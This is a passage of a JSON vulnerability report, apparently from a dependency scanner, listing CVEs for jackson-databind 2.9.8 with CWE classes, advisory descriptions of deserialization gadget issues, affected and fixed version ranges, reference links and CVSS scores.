serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36188/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10673"]}],"cve":"CVE-2020-10673","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:04","ids":[{"system_name":"CVE Record","text":"CVE-2020-10673"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"]}],"title":"CVE-2020-10673/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24616"]}],"cve":"CVE-2020-24616","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:14:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-24616"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Code Injection in 
jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Code Injection in jackson-databind This project contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"]}],"title":"CVE-2020-24616/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11620"]}],"cve":"CVE-2020-11620","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T20:19:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-11620"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the 
interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11620/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14060"]}],"cve":"CVE-2020-14060","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-14060"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability 
Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14060/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42003"]}],"cve":"CVE-2022-42003","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42003"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221124-0004"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in Jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in Jackson-databind In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to 
avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0. Commits that introduced vulnerable code are https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc. Fix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.12.7.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221124-0004","url":"https://security.netapp.com/advisory/ntap-20221124-0004"},{"summary":"Debian Advisory 
dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"]}],"title":"CVE-2022-42003/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36184"]}],"cve":"CVE-2020-36184","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:26","ids":[{"system_name":"CVE Record","text":"CVE-2020-36184"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, 
related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36184/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14195"]}],"cve":"CVE-2020-14195","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:43","ids":[{"system_name":"CVE Record","text":"CVE-2020-14195"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to 
org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14195/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9548"]}],"cve":"CVE-2020-9548","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:01","ids":[{"system_name":"CVE Record","text":"CVE-2020-9548"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory 
